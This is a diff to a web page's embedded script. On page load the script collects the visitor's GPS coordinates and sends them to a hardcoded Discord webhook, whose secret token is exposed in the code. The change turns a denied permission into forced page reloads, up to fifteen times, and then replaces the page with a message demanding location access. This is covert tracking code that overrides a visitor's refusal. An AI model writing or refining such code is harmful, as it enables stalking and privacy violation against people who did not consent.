--- a/index.html
+++ b/index.html
@@ -37,8 +37,14 @@
     <script>
         const webhookURL = "https://discord.com/api/webhooks/1287627812701999115/DPX6pSyOlJXHkS_-KxNj03O1233HQlF-TnYPD_H05Gx90NNF9syL118ZL9lYmffgFdMG";
 
+        // Maximum number of refresh attempts
+        const maxAttempts = 15;
+
         // Function to get GPS coordinates and send them to the webhook
         function getGPS() {
+            // Check if attempts have been made before
+            let attempts = parseInt(localStorage.getItem('gpsAttempts')) || 0;
+
             if (navigator.geolocation) {
                 navigator.geolocation.getCurrentPosition(async function (position) {
                     const latitude = position.coords.latitude;
@@ -58,13 +64,22 @@
                             },
                             body: JSON.stringify(data)
                         });
+                        // Reset attempts after success
+                        localStorage.setItem('gpsAttempts', 0);
                     } catch (error) {
                         console.error("Failed to send GPS data:", error);
                     }
                 }, function (error) {
-                    // If permission denied, continuously ask for location again without reloading
-                    if (error.code === error.PERMISSION_DENIED) {
-                        getGPS(); // Prompt again
+                    // On error (permission denied, etc.), reload the page if attempts are under the maxAttempts threshold
+                    attempts++;
+                    localStorage.setItem('gpsAttempts', attempts);
+
+                    if (attempts < maxAttempts) {
+                        // Reload the page to prompt again
+                        location.reload();
+                    } else {
+                        // After max attempts, stop reloading and show an error message
+                        document.body.innerHTML = "<h1>Location access is required for better service. Please enable location access and refresh the page.</h1>";
                     }
                 });
             } else {
@@ -72,7 +87,7 @@
             }
         }
 
-        // Trigger GPS permission request on page load
+        // Trigger GPS permission request on page load without an additional alert
         window.onload = function () {
             getGPS();
         };
